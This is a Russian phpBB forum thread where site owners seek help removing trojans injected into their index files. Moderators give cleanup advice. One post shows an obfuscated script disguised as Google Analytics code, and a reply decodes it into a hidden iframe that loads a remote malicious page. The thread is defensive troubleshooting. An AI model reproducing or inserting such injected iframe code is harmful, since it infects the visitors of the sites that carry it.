Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- Former team member
- Сообщения: 442
- Стаж: 17 лет 6 месяцев
- Откуда: Санкт-Петербург
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
Обновите пароль старого админа и все, только после удаления трояна.xkaa писал(а):под учетной записью "старого" админа уже нельзя будет?
-
- phpBB 1.0.0
- Сообщения: 7
- Стаж: 17 лет
Re: Как убить Трояна?
Fray98rus, спасибо, но тут сложнее. Я описал ситуацию здесь: http://www.phpbbguru.net/community/topi ... ml#p233212
Палыч, уточните, пожалуйста, по моим вопросам и что-нибудь про ссылку...
Спасибо.
Палыч, уточните, пожалуйста, по моим вопросам и что-нибудь про ссылку...
Спасибо.
-
- Former team member
- Сообщения: 9683
- Стаж: 18 лет 11 месяцев
- Откуда: Питер
- Благодарил (а): 1 раз
- Поблагодарили: 27 раз
Re: Как убить Трояна?
Ничего сложного. Вам требуется получить доступ к админке. Вот и получите.xkaa писал(а):но тут сложнее.
Можете через админку изменить всё, что вам требуется.
Fray98rus вам правильно подсказывает дальнейшие действия.
Ссылку поправил.
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
-
- phpBB 1.0.0
- Сообщения: 3
- Стаж: 16 лет 2 месяца
Re: Как убить Трояна?
Доброе время суток!
Мой форум был заражен вирусом, об этом сообщили пользователи, у которых антивирусник аваста, тут же сменила пароль, проверила комп на вирусы, удалила их, вручную проверила основные файлы, которые могли быть заражены, инфреймов не нашла, скриптов левых тоже, тогда сделала полный бэкап файлов форума. Ничего не изменилось, пользователи с авастой пишут о вирусах, а другие жалуются на незначительные глюки. Проверяла форум различными вебсканерами, они вирусов не видят, у самой меня все нормально. Что еще можно сделать? Честно говоря, думала, что бэкап должен помочь был точно Оо
Буду оч благдарна. если поможете советом)
П.С. www.forum.kaulitztwins.ru
Мой форум был заражен вирусом, об этом сообщили пользователи, у которых антивирусник аваста, тут же сменила пароль, проверила комп на вирусы, удалила их, вручную проверила основные файлы, которые могли быть заражены, инфреймов не нашла, скриптов левых тоже, тогда сделала полный бэкап файлов форума. Ничего не изменилось, пользователи с авастой пишут о вирусах, а другие жалуются на незначительные глюки. Проверяла форум различными вебсканерами, они вирусов не видят, у самой меня все нормально. Что еще можно сделать? Честно говоря, думала, что бэкап должен помочь был точно Оо
Буду оч благдарна. если поможете советом)
П.С. www.forum.kaulitztwins.ru
-
- Former team member
- Сообщения: 9683
- Стаж: 18 лет 11 месяцев
- Откуда: Питер
- Благодарил (а): 1 раз
- Поблагодарили: 27 раз
Re: Как убить Трояна?
Sleepy
Посоветовать пишушим пользователям очистить кеш на своих браузерах.
Посоветовать пишушим пользователям очистить кеш на своих браузерах.
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
-
- phpBB 1.0.0
- Сообщения: 3
- Стаж: 16 лет 2 месяца
Re: Как убить Трояна?
Один из пишущих о вирусах - модератор. Она удаляла кэш, загружала форум с разных браузеров (после удаления кэша), проверяла комп на вирусы, перезагружала и т.д. Аваста пишет: обнаружен червь HTML:iFrame-inf.
-
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
Re: Как убить Трояна?
кроме файлов, iFrame может в описаниях к форуму к примеру быть. Сделайте беккап бд, и в нём поищите <iframe src=
-
- Former team member
- Сообщения: 3739
- Стаж: 19 лет 10 месяцев
- Поблагодарили: 3 раза
Re: Как убить Трояна?
Вообще-то надо делать наоборот - сначала чистить комп, а уж потом на чистом менять пароль.Sleepy писал(а):тут же сменила пароль, проверила комп на вирусы, удалила их, вручную проверила основные файлы, которые могли быть заражены, инфреймов не нашла, скриптов левых тоже, тогда сделала полный бэкап файлов форума.
-
- phpBB 1.0.0
- Сообщения: 3
- Стаж: 16 лет 2 месяца
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 16 лет 11 месяцев
Re: Как убить Трояна?
Вот опять какая-то хрень прицепилась во всех Index файлах:
кто-нибудь понимает вредоносность данного скрипта?
Код: Выделить всё
<!-- http://www.google-analytics.com --><script>var source ="=jgsbnf!tsd>#iuuq;00tfpusbgg/cj{0hpphmf0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script><!--/ http://www.google-analytics.com -->
-
- Former team member
- Сообщения: 2616
- Стаж: 19 лет 8 месяцев
- Откуда: Новосибирск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
Оно же, только раскодированное:SDSFox писал(а):кто-нибудь понимает вредоносность данного скрипта?
Код: Выделить всё
<iframe src="http://seotraff.biz/google/iframe.php" width=1 height=1 style="visibility: hidden"></iframe>
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
-
- phpBB 2.0.16
- Сообщения: 1097
- Стаж: 16 лет 3 месяца
- Откуда: root/world/russia/
- Благодарил (а): 17 раз
- Поблагодарили: 24 раза
Re: Как убить Трояна?
Сегодня обнаружил у себя на форуме во всех файлах index.* такого зверя HEUR:Trojan.Script.Iframer заметил только изза того что индексные страницы перестали запускаться и выдавало ошибку (в конце файла добавлялся код трояна)
Как он мог туда попасть я ума не приложу, к FTP имею доступ только я, но буквально вчера проверял свой комп на вирусы полным сканированием Касперского 8 (именно им потом обнаружил заразу в скачанном index.php), на бэкапе файлов форума недельной давности вирусов нет, можно грешить на хостера? Я вобще FTP клиентами не пользуюсь, все через вебинтерфейс Cpanel оперой, пароль только в голове, на компе никогда не сохранял...
Как он мог туда попасть я ума не приложу, к FTP имею доступ только я, но буквально вчера проверял свой комп на вирусы полным сканированием Касперского 8 (именно им потом обнаружил заразу в скачанном index.php), на бэкапе файлов форума недельной давности вирусов нет, можно грешить на хостера? Я вобще FTP клиентами не пользуюсь, все через вебинтерфейс Cpanel оперой, пароль только в голове, на компе никогда не сохранял...
-
- Former team member
- Сообщения: 3739
- Стаж: 19 лет 10 месяцев
- Поблагодарили: 3 раза
Re: Как убить Трояна?
Ну и чего ты сюда пишешь? Чтоб потрындить как бабульки на лавочке и догадки высказывать?
Обратись к хостеру, пусть смотрят логи, кто и когда изменял файлы. Как это происходило, по фтп или еще как.
Обратись к хостеру, пусть смотрят логи, кто и когда изменял файлы. Как это происходило, по фтп или еще как.
-
- phpBB 1.0.0
- Сообщения: 2
- Стаж: 15 лет 11 месяцев
-
- Former team member
- Сообщения: 3739
- Стаж: 19 лет 10 месяцев
- Поблагодарили: 3 раза
Re: Как убить Трояна?
Srogov
Думаешь он месяц ждал твоего совета?
Причем совета откровенно тупого.
Думаешь он месяц ждал твоего совета?
Причем совета откровенно тупого.
Garret_Dark писал(а):буквально вчера проверял свой комп на вирусы полным сканированием Касперского 8
Предлагаешь полное сканирование компа вручную, чтоб искать фреймы??? В экзешниках тоже будешь вручную искать?Srogov писал(а):Если антивирусы не видят, придется вручную посмотреть iframe.